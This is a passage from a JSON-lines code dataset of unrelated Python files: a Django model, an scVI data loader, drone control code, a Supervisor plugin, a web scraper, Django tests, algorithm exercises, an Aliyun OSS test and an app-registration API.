diagnostic = models.TextField(null=True, blank=True, verbose_name='diagnóstico')\n ttd = models.TextField(null=True, blank=True, verbose_name='ttd')\n\n class Meta:\n verbose_name = 'historia clínica'\n","sub_path":"core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"388294084","text":"import os\nimport logging\nfrom pathlib import Path\nfrom zipfile import ZipFile\n\nimport numpy as np\nimport pandas as pd\n\nfrom scvi.dataset.dataset import DownloadableDataset\n\nlogger = logging.getLogger(__name__)\n\n\nclass HematoDataset(DownloadableDataset):\n \"\"\"Loads the hemato dataset.\n\n This dataset contains continuous gene expression variations from hematopoeitic progenitor cells [31] contains\n 4,016 cells and 7,397 genes. We removed the library basal-bm1 which was of poor quality based on authors\n recommendation. We use their population balance analysis result as a potential function for differentiation.\n\n Examples:\n >>> gene_dataset = HematoDataset()\n \"\"\"\n\n def __init__(\n self, save_path: str = \"data/HEMATO/\", delayed_populating: bool = False\n ):\n self.gene_names_filename = \"bBM.filtered_gene_list.paper.txt\"\n self.spring_and_pba_filename = \"bBM.spring_and_pba.csv\"\n self.cell_types_levels = [\n \"Erythroid\",\n \"Granulocytic Neutrophil\",\n \"Lymphocytic\",\n \"Dendritic\",\n \"Megakaryocytic\",\n \"Monocytic\",\n \"Basophilic\",\n ]\n super().__init__(\n urls=[\n \"https://www.ncbi.nlm.nih.gov/geo/download/?acc=GSM2388072&format=file&\"\n \"file=GSM2388072%5Fbasal%5Fbone%5Fmarrow%2Eraw%5Fumifm%5Fcounts%2Ecsv%2Egz\",\n \"https://github.com/romain-lopez/scVI-reproducibility/raw/master/additional/data.zip\",\n ],\n filenames=[\"bBM.raw_umifm_counts.csv.gz\", \"data.zip\"],\n save_path=save_path,\n delayed_populating=delayed_populating,\n )\n\n def populate(self):\n logger.info(\"Preprocessing Hemato data\")\n\n if len(os.listdir(self.save_path)) == 2: # nothing extracted yet\n with ZipFile(os.path.join(self.save_path, \"data.zip\"), \"r\") as zip:\n zip.extractall(path=Path(self.save_path).parent)\n raw_counts = pd.read_csv(\n os.path.join(self.save_path, self.filenames[0]), compression=\"gzip\"\n )\n\n # remove this library to avoid dealing with batch effects\n raw_counts.drop(\n raw_counts.index[raw_counts[\"library_id\"] == \"basal_bm1\"], inplace=True\n )\n\n spring_and_pba = pd.read_csv(\n os.path.join(self.save_path, self.spring_and_pba_filename)\n )\n gene_names = np.loadtxt(\n os.path.join(self.save_path, self.gene_names_filename), dtype=np.str\n )\n\n data = raw_counts.merge(spring_and_pba, how=\"inner\")\n expression_data = data[gene_names]\n x_spring = data[\"x_spring\"].values\n y_spring = data[\"y_spring\"].values\n\n self.meta = data[\n [\"Potential\", \"Pr_Er\", \"Pr_Gr\", \"Pr_Ly\", \"Pr_DC\", \"Pr_Mk\", \"Pr_Mo\", \"Pr_Ba\"]\n ]\n\n def logit(p):\n p = np.copy(p.values)\n p[p == 0] = np.min(p[p > 0])\n p[p == 1] = np.max(p[p < 1])\n return np.log(p / (1 - p))\n\n labels = logit(self.meta.iloc[:, 2]) - logit(self.meta.iloc[:, 1])\n expression_data = expression_data.values\n\n logger.info(\"Finished preprocessing Hemato data\")\n self.populate_from_data(\n X=expression_data,\n labels=labels,\n gene_names=gene_names,\n cell_attributes_dict={\"x_coord\": x_spring, \"y_coord\": y_spring},\n )\n self.filter_cells_by_count()\n","sub_path":"scvi/dataset/hemato.py","file_name":"hemato.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"210065229","text":"#!/usr/bin/python3\r\n\r\n# Copyright (C) 2017 Masahiro Tsuji\r\n#\r\n# This file is part of PyDrone.\r\n#\r\n# PyDrone is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation, either version 3 of the License, or\r\n# (at your option) any later version.\r\n#\r\n# PyDrone is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with PyDrone. If not, see .\r\n#\r\n\r\nfrom optparse import OptionParser, OptionValueError\r\n\r\n# sudo pip3 install pyyaml\r\nimport yaml\r\nimport math\r\nimport time\r\n\r\nfrom debug_tools.attitude_log import AttitudeLog\r\nfrom thrust.thrust import Thrust\r\nfrom sensor.sensor import Sensor\r\nfrom pilot.pilot import Pilot\r\nfrom controller.controller import Controller\r\nfrom time_log import TimeLog\r\nfrom led_pyzero import Led\r\n\r\ndef main_loop(conf_file, log_path, controll_method):\r\n Led.change(False)\r\n pilot = Pilot(controll_method)\r\n print(\"Ready\")\r\n cmd = Pilot.CMD_NOP\r\n while True:\r\n last_cmd = cmd\r\n cmd = pilot.get_cmd()\r\n if cmd == Pilot.CMD_NOP:\r\n pass\r\n elif last_cmd == Pilot.CMD_NOP and cmd == Pilot.CMD_THROTTLE_ZERO:\r\n # start\r\n try:\r\n params = yaml.load(open(conf_file, \"rt\"))\r\n except:\r\n print(\"ERROR can not read conf file\")\r\n raise\r\n if log_path is not None:\r\n # over write log_path if --log option is specifed\r\n params[\"log\"][\"path\"] = log_path\r\n sensor = Sensor()\r\n dt = sensor.sampling_interval()\r\n controller = Controller(dt=dt,**params[\"controller\"])\r\n print(\"ctrl start\")\r\n pilot.initialize()\r\n alog = AttitudeLog(**params[\"log\"])\r\n Led.change(True)\r\n with Thrust(params[\"body_const\"]) as thrust:\r\n control_loop(pilot, sensor, controller, thrust, alog)\r\n print(\"ctrl end\")\r\n Led.change(False)\r\n alog.add_info('param', params)\r\n alog.save() \r\n print(\"seve end\")\r\n time.sleep(0.5) \r\n Led.toggle()\r\n\r\n\r\n \r\ndef throttle_correction(throttle_in, angle):\r\n DEG_TO_RAD = math.pi/180\r\n return throttle_in/(math.cos(angle[1] * DEG_TO_RAD) * math.cos(angle[2] * DEG_TO_RAD))\r\n\r\ndef control_loop(pilot, sensor, controller, thrust, alog):\r\n timelog = TimeLog()\r\n start_time = None\r\n startup_done =False\r\n while True:\r\n cmd = pilot.get_cmd()\r\n if cmd==Pilot.CMD_THROTTLE_ZERO:\r\n if startup_done:\r\n break\r\n else:\r\n startup_done = True\r\n if cmd==Pilot.CMD_EMERGENCY:\r\n print(\"EMERGENCY!\")\r\n break\r\n timelog.checkpoint_first()\r\n retrieve_time, angle, angular_velocity, acc = sensor.get()\r\n timelog.checkpoint(retrieve_time)\r\n timelog.checkpoint()\r\n throttle, setpoint = pilot.get_setpoint(angle, angular_velocity, acc)\r\n throttle_out = throttle_correction(throttle, angle)\r\n tau = controller.out(angle, angular_velocity, setpoint)\r\n thrust.set_thrust(throttle_out, tau)\r\n time_result = timelog.checkpoint(is_last=True)\r\n if startup_done == False:\r\n continue\r\n if start_time is None:\r\n start_time = retrieve_time\r\n alog.append(time = retrieve_time - start_time,\r\n time_log = time_result[:],\r\n angle_ypr = list(angle), \r\n gyro_ypr = list(angular_velocity),\r\n raw_acc = list(acc),\r\n out_throttle = throttle_out,\r\n out_tau = list(tau),\r\n pilot_ypr = list(setpoint),\r\n pilot_throttle = throttle) \r\n thrust.set_thrust(0,[0,0,0]) \r\n\r\n\r\nif __name__ == \"__main__\":\r\n \"\"\"\r\n QuadCopter Controller v0.1\r\n \r\n \"\"\"\r\n usage = \"usage: %prog [options] keyword\"\r\n parser = OptionParser(usage)\r\n parser.add_option(\r\n \"--hid\",\r\n action=\"store_true\", # Trueを保存\r\n # store_falseならFalseを保存\r\n default=False,\r\n help=\"use hid joystic\"\r\n )\r\n parser.add_option(\r\n \"-c\", \"--conf\",\r\n action=\"store\", type=\"string\", dest=\"conf_file\",\r\n default=\"pydrone.conf\",\r\n help=\"configuration file\"\r\n )\r\n parser.add_option(\r\n \"-l\", \"--log\",\r\n action=\"store\", type=\"string\", dest=\"log_path\",\r\n default=None,\r\n help=\"path for log file\"\r\n )\r\n (options, args) = parser.parse_args()\r\n\r\n Led.change(False)\r\n\r\n if options.hid:\r\n controll_method=Pilot.METHOD_HID\r\n else:\r\n controll_method=Pilot.METHOD_UDP\r\n\r\n main_loop(options.conf_file, options.log_path, controll_method)\r\n","sub_path":"pydrone.py","file_name":"pydrone.py","file_ext":"py","file_size_in_byte":5128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"250434168","text":"\"\"\"\nCommon core objects\n\"\"\"\nfrom abc import ABC, abstractmethod\nfrom dataclasses import asdict, dataclass\nfrom typing import Any, Dict, Iterator, List\n\n\nclass GitError(Exception):\n \"\"\"Wrapper exception for Git failures.\"\"\"\n\n\n@dataclass\nclass Commit:\n \"\"\"Core class representing a commit\"\"\"\n\n hash: str\n author_name: str\n author_mail: str\n author_date: int\n commit_name: str\n commit_mail: str\n commit_date: int\n subject: str\n body: str\n parents: List[str]\n\n def asdict(self) -> Dict[str, Any]:\n return asdict(self)\n\n\nclass GitPort(ABC):\n \"\"\"Git repository port\"\"\"\n\n @abstractmethod\n def list_commits(self) -> Iterator[Commit]:\n \"\"\"Returns an iterator will all the commits from the repository\"\"\"\n\n @staticmethod\n @abstractmethod\n def valid_url(url: str) -> bool:\n \"\"\"Must return true only if the instance supports this URL\"\"\"\n","sub_path":"commit_viewer/git/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"98938899","text":"#!/usr/bin/python\n#-*- coding: utf-8 -*-\n\n# ======================================================================\n# Copyright 2016 Julien LE CLEACH\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ======================================================================\n\nimport errno\nimport os\n\nfrom supervisor.options import ServerOptions\nfrom supervisor.web import VIEWS\nfrom supervisor.xmlrpc import Faults\n\nfrom supvisors.rpcinterface import RPCInterface\nfrom supvisors.viewprocaddress import ProcAddressView\nfrom supvisors.viewhostaddress import HostAddressView\nfrom supvisors.viewapplication import ApplicationView\nfrom supvisors.viewimage import *\nfrom supvisors.viewsupvisors import SupvisorsView\n\n\n# Supvisors related faults\nclass SupvisorsFaults:\n SUPVISORS_CONF_ERROR, BAD_SUPVISORS_STATE, BAD_ADDRESS, BAD_STRATEGY, \\\n BAD_EXTRA_ARGUMENTS = range(5)\n\nFAULTS_OFFSET = 100\n\ndef expand_faults():\n \"\"\" Expand supervisord Fault definition. \"\"\"\n for (x, y) in SupvisorsFaults.__dict__.items():\n if not x.startswith('__'):\n setattr(Faults, x, y + FAULTS_OFFSET)\n\n\ndef update_views():\n \"\"\" Trick to replace Supervisor main page. \"\"\"\n # replace Supervisor main entry\n here = os.path.abspath(os.path.dirname(__file__))\n # set main page\n VIEWS['index.html'] = {'template': os.path.join(here, 'ui/index.html'),\n 'view': SupvisorsView}\n # set address /processpage\n VIEWS['procaddress.html'] = {'template': os.path.join(\n here, 'ui/procaddress.html'),\n 'view': ProcAddressView}\n # set address/host page\n VIEWS['hostaddress.html'] = {'template': os.path.join(\n here, 'ui/hostaddress.html'),\n 'view': HostAddressView}\n # set application page\n VIEWS['application.html'] = {'template': os.path.join(\n here, 'ui/application.html'),\n 'view': ApplicationView}\n # set fake page to export images\n VIEWS['process_cpu.png'] = {'template': os.path.join(\n here, 'ui/empty.html'),\n 'view': ProcessCpuImageView}\n VIEWS['process_mem.png'] = {'template': os.path.join(\n here, 'ui/empty.html'),\n 'view': ProcessMemoryImageView}\n VIEWS['address_cpu.png'] = {'template': os.path.join(\n here, 'ui/empty.html'),\n 'view': AddressCpuImageView}\n VIEWS['address_mem.png'] = {'template': os.path.join(\n here, 'ui/empty.html'),\n 'view': AddressMemoryImageView}\n VIEWS['address_io.png'] = {'template': os.path.join(\n here, 'ui/empty.html'),\n 'view': AddressNetworkImageView}\n\n\ndef cleanup_fds(self):\n \"\"\" This is a patch of the Supervisor cleanup_fds in ServerOptions.\n The default version is a bit rough and closes all file descriptors of\n the process, including the PyZmq ones, which leads to a low-level crash\n in select/poll. \"\"\"\n pid = os.getpid()\n proc_fd = '/proc/{}/fd'.format(pid)\n zmq_inodes = []\n for fd in os.listdir(proc_fd):\n try:\n inode = os.readlink(proc_fd + '/' + fd)\n except OSError as err:\n if err.errno in (errno.ENOENT, errno.ESRCH, errno.EINVAL):\n continue\n else:\n print('[ERROR] unexpected readlink error: {}'.format(err))\n else:\n # check if the inode is a ZMQ\n if inode.startswith('anon_inode:[') or \\\n inode.startswith('socket:['):\n zmq_inodes.append(int(fd))\n # the following is adapted from the original cleanup_fds\n # it just avoids to close the Zmq inodes\n start = 5\n for x in range(start, self.minfds):\n if x not in zmq_inodes:\n try:\n os.close(x)\n except OSError:\n pass\n\n\ndef make_supvisors_rpcinterface(supervisord, **config):\n \"\"\" Supervisor entry point. \"\"\"\n # update Supervisor Fault definition\n expand_faults()\n # update Supervisor http web pages\n update_views()\n # patches the Supervisor ServerOptions.cleanup_fds\n ServerOptions.cleanup_fds = cleanup_fds\n # create and return handler\n return RPCInterface(supervisord)\n","sub_path":"supvisors/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":4807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"607874293","text":"import bs4 as bs\nimport requests\nimport numpy as np\nimport pandas as pd\nimport re\nimport os\n\n\ndef extractNumber(string_value):\n number = re.findall(r'\\d+', string_value)\n return number\n\n\ndef spider(max_pages):\n page=0\n name = list()\n price = list()\n\n while page < max_pages:\n url = 'http://www.asos.com/men/hoodies-sweatshirts/cat/?cid=5668&nlid=mw|clothing|shop+by+product/page' + str(page+1)\n source_code = requests.get(url).text\n soup = bs.BeautifulSoup(source_code,\"html.parser\")\n\n for link in soup.find_all('a', {'class': '_3x-5VWa'}):\n name.append(link.get('aria-label'))\n\n for link in soup.find_all('span', {'class':'_342BXW_'}):\n data = link.text\n data = data.strip('£')\n price.append(float(data))\n\n page = page +1\n\n name = np.asanyarray(name)\n price = np.asanyarray(price)\n\n data = {'price':price,'title': name}\n dataFrame = pd.DataFrame(data)\n print(dataFrame)\n\n return\n\n\nspider(10)\n","sub_path":"Spyder.py","file_name":"Spyder.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"274837058","text":"from django.test import TestCase\nfrom main import models\nfrom django.core.files.images import ImageFile\nfrom decimal import Decimal\nimport logging\n\n\nclass TestThumbnailSignals(TestCase):\n def test_thumbnails_are_created_on_save(self):\n product = models.Product(\n name=\"The cathedral and the bazaar\",\n price=Decimal(\"20.00\")\n )\n product.save()\n\n with open(\"main/fixtures/the-cathedral-the-bazaar.jpg\", \"rb\") as f:\n image = models.ProductImage(\n product=product,\n image=ImageFile(f, name=\"tctb.jpg\"),\n )\n logger = logging.getLogger(\"main\")\n with self.assertLogs(logger, level=\"INFO\") as cm:\n image.save()\n\n self.assertGreaterEqual(len(cm.output), 1)\n image.refresh_from_db()\n\n with open(\"main/fixtures/the-cathedral-the-bazaar.thumb.jpg\", \"rb\") as tn:\n expected_content = tn.read()\n thumbnail = image.thumbnail.read()\n assert thumbnail == expected_content\n\n image.thumbnail.delete(save=False)\n image.image.delete(save=False)\n\n","sub_path":"django/main/tests/test_signals.py","file_name":"test_signals.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"445318639","text":"from xlrd import open_workbook\r\nfrom django.conf import settings\r\nimport re\r\n\r\n# Excel files will be named \"year div.xlsx\"\r\ndef getRollNos (year, div):\r\n\tbook = open_workbook (settings.BASE_PATH + \"mentorship/static/Roll Nos/%s %s.xlsx\"%(year,div))\r\n\r\n\t# first sheet\r\n\tsheet = book.sheet_by_index (0)\r\n\r\n\tstudents = []\r\n\r\n\tfor ind in range(sheet.nrows):\r\n\t\ttemp = sheet.row_values(ind)\r\n\t\tif re.match(\"[0-9]+\", str(temp[0])):\r\n\t\t\tstudents.append ((int(temp[0]), temp[1]))\r\n\t\telse:\r\n\t\t\tstudents.append ((temp[0], temp[1]))\r\n\r\n\treturn students\r\n","sub_path":"mentorship/administrator/excel.py","file_name":"excel.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"17753489","text":"#!/bin/env python\n\n#\n# Jed Dobson\n# James.E.Dobson@Dartmouth.EDU\n# June 2020\n# \n# htrc-vector-project\n#\n\n\nimport csv\nfrom gensim.models.doc2vec import Doc2Vec, TaggedDocument\nimport bz2\n\npages = list()\n# open CSV file and read individual pages of tokens\nwith bz2.open('drama_17412.csv.bz2','rt',encoding = \"ISO-8859-1\") as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n pages.append(row),\n\nprint(\"finished reading\")\n# produce tagged_data\ntagged_data = [TaggedDocument(words=_d, tags=[str(i)]) for i, _d in enumerate(pages)]\n\nprint(\"creating model\")\nmodel = Doc2Vec(tagged_data, \n dm=1, # operate on paragraphs with distributed memory model\n vector_size=300, # larger vector size might produce better results\n min_count=5, # drop words with very few repetitions\n window=100, # larger window size because of extracted features\n workers=4)\n\nprint(\"saving model\")\nmodel.save(\"doc2vec-07-28-2020-drama.w2v\")\n","sub_path":"scripts/mkmodel_csv.py","file_name":"mkmodel_csv.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"457074360","text":"from typing import List\n# Solution - 1 (GREEDY approach) O(n) time O(1) space\n'''\nFollows the idea of greedy approach\nwe keep calculating current max and compare it with global max\nUpdate global max if current max > global max\nNote since only positive numbers will increase cur_sum, \ngreedy approach works here with current accumulated sum vs num at current index.\n'''\ndef max_sub_array(self,nums:List[int]) -> int:\n n = len(nums)\n cur_sum = max_sum = nums[0]\n\n for i in range(1,n):\n cur_sum = max(nums[i],cur_sum + nums[i])\n max_sum = max(cur_sum,max_sum)\n return max_sum\n\n\n# Solution 2 - KADANES algorithm DP approach O(n) time O(1) space (since implemented with same array)\n'''\nFollows the idea of adding numbers only if they are \ngreater > 0 ( positive ) and using the current array \nas dp table. keep comparing to global max reached so far\nand return. Note if dont want to modify input array, can store\nextra dp table.\n'''\ndef max_sub_array_dp(self,nums:List[int]) -> int:\n n = len(nums)\n\n max_sum = nums[0]\n for i in range(1,n+1):\n # Only add positive numbers\n if nums[i-1] > 0:\n # Store in current array to get max sum so far\n nums[i] = nums[i] + nums[i-1]\n max_sum = max(max_sum,nums[i])\n return max_sum\n","sub_path":"LeetCode/FAQ/10-Maximum-Contiguous-Sum-Easy/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"494098761","text":"'''\nBOURDON ANTOINE-ALEXIS\nTP3 ALGO3\nL2 2018-2019\n'''\n\nimport time\nimport random\n\ndef fibonacci(n):\n\t'''Fonction calculant une suite de fibonacci de maniere recursive.\n\t\n\tint -> int'''\n\tif n<=1:\n\t\treturn 1\n\treturn fibonacci(n-1)+fibonacci(n-2)\n\ndef fibonacci_iteratif(n):\n\t'''Fonction calculant une suite de fibonacci de maniere interative.\n\t\n\tint -> int'''\n\ti=0\n\t# attention sur les sldes f(0) = 1 donc p =1\n\tp, q=1,1\n\twhile i int'''\n\tif n==0:\n\t\treturn p\n\telse :\n\t\treturn fibonacci_terminale(n-1,q,p+q)\n\ndef comparaison_fibo(n):\n\ttemp1 = time.time()\n\tfibonacci(n)\n\tprint(\"Pour \",n,\" , la suite fibonacci recursive fait un temps de \",time.time()-temp1,\" secondes\")\n\n\ttemp1 = time.time()\n\tfibonacci_iteratif(n)\n\tprint(\"Pour \",n,\" , la suite fibonacci itérative fait un temps de \",time.time()-temp1,\" secondes\")\n\n\ttemp1 = time.time()\n\tfibonacci_terminale(n)\n\tprint(\"Pour \",n,\" , la suite fibonacci terminale fait \",time.time()-temp1,\" secondes\")\n\n##2\n\ndef fac_iterative(n):\n\t'''Fonction calculant le factoriel de n de maniere iterative.\n\t\n\tint -> int'''\n\tres=1\n\tfor i in range(2, n+1):\n\t\tres=res*i\n\treturn res\n\ndef fac_recursive(n):\n\t'''Fonction calculant le factoriel de n de maniere recursive.\n\t\n\tint -> int'''\n\tif n == 0:\n\t\treturn 1\n\telse :\n\t\treturn fact_recursive(n-1)*n\n##3\n\ndef liste_recur(l,i=0,j=1):\n\t'''Fonction renvoyant la somme de l[i]l[j].\n\t\n\tint -> int'''\n\tif (i==len(l)-2) and (j==len(l)-1):\n\t\treturn l[i]*l[j]\n\telif (j==len(l)-1):\n\t\treturn l[i]*l[j]+ liste_recur(l,i+1,i+2)\n\telse:\n\t\treturn l[i]*l[j]+ liste_recur(l,i,j+1)\n\n##4\ndef entier_intervalle(liste,nb1,nb2):\n\t'''Prend une liste d'entier et des intervalles pour vérifier si ils sont bien dans la liste\n\tliste--> Liste\n\tnb1--> int\n\tnb2--> int\n\treturn bool'''\n\tfor i in range (nb1,nb2+1):\n\t\tif i not in liste:\n\t\t\treturn False\n\treturn True\n\n##5\n\n\ndef fusion(l1,l2):\n\t'''Fonction la fusion de deux listes\n\t\n\tlist, list -> list'''\n\tif l1==[]:\n\t\treturn l2\n\telif l2==[]:\n\t\treturn l1\n\telif l1[0] list'''\n\tif l1 == []:\n\t\treturn fusion(l2,l3)\n\telif l2 == []:\n\t\treturn fusion(l1,l3)\n\telif l3 == []:\n\t\treturn fusion(l2,l1)\n\telif l1[0]0 and tableau[j-1]>en_cours:\n\t\t\ttableau[j]=tableau[j-1]\n\t\t\tj = j-1\n\t\t\t#on insère l'élément à sa place\n\t\ttableau[j]=en_cours\n\t\t\n\t\n\ndef fusion(gauche,droite):\n\tresultat = []\n\tindex_gauche, index_droite = 0, 0\n\twhile index_gauche < len(gauche) and index_droite < len(droite):\t\t\n\t\tif gauche[index_gauche] <= droite[index_droite]:\n\t\t\tresultat.append(gauche[index_gauche])\n\t\t\tindex_gauche += 1\n\t\telse:\n\t\t\tresultat.append(droite[index_droite])\n\t\t\tindex_droite += 1\n\tif gauche:\n\t\tresultat.extend(gauche[index_gauche:])\n\tif droite:\n\t\tresultat.extend(droite[index_droite:])\n\treturn resultat\n\t \ndef tri_fusion(m):\n\tif len(m) <= 1:\n\t\treturn m\n\tmilieu = len(m) // 2\n\tgauche = m[:milieu]\n\tdroite = m[milieu:]\n\tgauche = tri_fusion(gauche)\n\tdroite = tri_fusion(droite)\n\treturn list(fusion(gauche, droite))\n\n\n\ndef tri_rapide(tableau):\n\tif not tableau:\n\t\treturn []\n\telse:\n\t\tpivot = tableau[-1]\n\t\tplus_petit = [x for x in tableau\t if x < pivot]\n\t\tplus_grand = [x for x in tableau[:-1] if x >= pivot]\n\t\treturn tri_rapide(plus_petit) + [pivot] + tri_rapide(plus_grand)\n\ndef generer_exo6(n,i,j):\n\t'''Fonction generant une liste de n valeur entre i et j\n\tint, int, int -> list'''\n\treturn random.sample(range(i,j), n)\n\ndef comparaison_exo6(l):\n\t'''\n\tfonction qui compare les 3 tris vu en cours, affiche leur temps.\n\tMeilleur tri : 1e-rapide puis 2e-fusion pour finir par 3e-insection.\n\tArguments :\n\t\t-None\n\tRetour:\n\t\t-None\n\t'''\n\n\ttemps1_inser = time.time()\n\ttri_insertion(l.copy())\n\tprint(\"Pour le tableau 1 en tri Insertion nous sommes à \",time.time()-temps1_inser,\" secondes\")\n\n\ttemps1_fusion = time.time()\n\ttri_fusion(l.copy())\n\tprint(\"Pour le tableau 1 en tri fusion nous sommes à \",time.time()-temps1_fusion,\" secondes\")\n\n\ttemps1_rapide = time.time()\n\ttri_rapide(l.copy())\n\tprint(\"Pour le tableau 1 en tri rapide nous sommes à \", time.time()-temps1_rapide, \" secondes\\n\")\n\n","sub_path":"L2/semestre3/algo3/TPs/TP03/BOURDON_Antoine-Alexis_TP3.py","file_name":"BOURDON_Antoine-Alexis_TP3.py","file_ext":"py","file_size_in_byte":4658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"236664315","text":"\"\"\"\nThis file demonstrates writing tests using the unittest module. These will pass\nwhen you run \"manage.py test\".\n\nReplace this with more appropriate tests for your application.\n\"\"\"\nimport unittest\nfrom unittest import TestCase\n\nfrom aliyun_oss.backends.oss import OSSStorage, OSSStorageFile\n\n\nclass SimpleTest(TestCase):\n def setUp(self):\n DEFAULT_FILE_STORAGE = 'aliyun_oss.backends.oss.OSSStorage'\n OSS_ACCESS_URL = ''\n OSS_ACCESS_KEY_ID = ''\n OSS_SECRET_ACCESS_KEY = ''\n OSS_STORAGE_BUCKET_NAME = ''\n from aliyun_oss.backends import oss\n oss.ACCESS_ADDRESS = OSS_ACCESS_URL\n oss.ACCESS_KEY_NAME = OSS_ACCESS_KEY_ID\n oss.SECRET_KEY_NAME = OSS_SECRET_ACCESS_KEY\n oss.HEADERS = {}\n oss.DEFAULT_ACL = 'public-read'\n oss.OSS_STORAGE_BUCKET_NAME = OSS_STORAGE_BUCKET_NAME\n oss.BUCKET_PREFIX = ''\n self.storage = OSSStorage(bucket=OSS_STORAGE_BUCKET_NAME,\n access_key=OSS_ACCESS_KEY_ID,\n secret_key=OSS_SECRET_ACCESS_KEY\n )\n\n def test(self):\n fname = '3rd/jquery-2.2.1.min.js'\n rt = self.storage.exists(fname)\n print('exists', rt)\n fd = OSSStorageFile(name=fname, storage=self.storage, mode='r')\n content = fd.open(fname)\n fd = open('/tmp/aaa.txt', 'w')\n fd.write(content)\n fd.close()\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"aliyun_oss/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"439818850","text":"# Given an array of integers nums and an integer target, return indices of the \n# two numbers such that they add up to target. \n# \n# You may assume that each input would have exactly one solution, and you may \n# not use the same element twice. \n# \n# You can return the answer in any order. \n# \n# \n# Example 1: \n# \n# \n# Input: nums = [2,7,11,15], target = 9\n# Output: [0,1]\n# Output: Because nums[0] + nums[1] == 9, we return [0, 1].\n# \n# \n# Example 2: \n# \n# \n# Input: nums = [3,2,4], target = 6\n# Output: [1,2]\n# \n# \n# Example 3: \n# \n# \n# Input: nums = [3,3], target = 6\n# Output: [0,1]\n# \n# \n# \n# Constraints: \n# \n# \n# 2 <= nums.length <= 10⁴ \n# -10⁹ <= nums[i] <= 10⁹ \n# -10⁹ <= target <= 10⁹ \n# Only one valid answer exists. \n# \n# \n# \n# Follow-up: Can you come up with an algorithm that is less than O(n²) time \n# complexity? Related Topics Array Hash Table 👍 24709 👎 815\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nfrom typing import List\n\n\nclass Solution:\n \"\"\"\n O(N) Time\n O(N) Space\n \"\"\"\n\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n complements = {}\n for index, value in enumerate(nums):\n complement = target - value\n if complement in complements:\n return [index, complements[complement]]\n else:\n complements[value] = index\n # leetcode submit region end(Prohibit modification and deletion)\n\n\nsolution = Solution()\ny = solution.twoSum([2, 7, 11, 15], 9)\nprint(y)\n","sub_path":"leetcode/editor/en/[1]Two Sum.py","file_name":"[1]Two Sum.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"105893206","text":"# coding: utf-8\n\nfrom flask import Blueprint, request, g, current_app\n\nfrom eru import consts\nfrom eru.models import App\nfrom eru.models.appconfig import verify_appconfig\nfrom eru.utils.decorator import jsonify, check_request_json, check_request_args\nfrom eru.utils.exception import EruAbortException\n\nbp = Blueprint('app', __name__, url_prefix='/api/app')\n\n@bp.route('//', methods=['GET', ])\n@jsonify\ndef get_app(name):\n app = App.get_by_name(name)\n if not app:\n raise EruAbortException(consts.HTTP_NOT_FOUND, 'App %s not found' % name)\n return app\n\n@bp.route('///', methods=['GET', ])\n@jsonify\ndef get_version(name, version):\n app = App.get_by_name(name)\n if not app:\n raise EruAbortException(consts.HTTP_NOT_FOUND, 'App %s not found' % name)\n\n v = app.get_version(version)\n if not v:\n raise EruAbortException(consts.HTTP_NOT_FOUND, 'Version %s not found' % version)\n return v\n\n@bp.route('/register/', methods=['POST', ])\n@jsonify\n@check_request_json(['name', 'version', 'git', 'token', 'appyaml'])\ndef register_app_version():\n data = request.get_json()\n name = data['name']\n\n version = data['version']\n\n app = App.get_or_create(name, data['git'], data['token'])\n if not app:\n current_app.logger.error('App create failed. (name=%s, version=%s)', name, version[:7])\n raise EruAbortException(consts.HTTP_BAD_REQUEST,\n 'App %s create failed, maybe token duplicated' % name)\n\n v = app.add_version(version)\n if not v:\n current_app.logger.error('Version create failed. (name=%s, version=%s)', name, version[:7])\n raise EruAbortException(consts.HTTP_BAD_REQUEST, 'Version %s create failed' % version[:7])\n\n appyaml = data['appyaml']\n try:\n verify_appconfig(appyaml)\n except (ValueError, KeyError) as e:\n raise EruAbortException(consts.HTTP_BAD_REQUEST, e.message)\n\n appconfig = v.appconfig\n 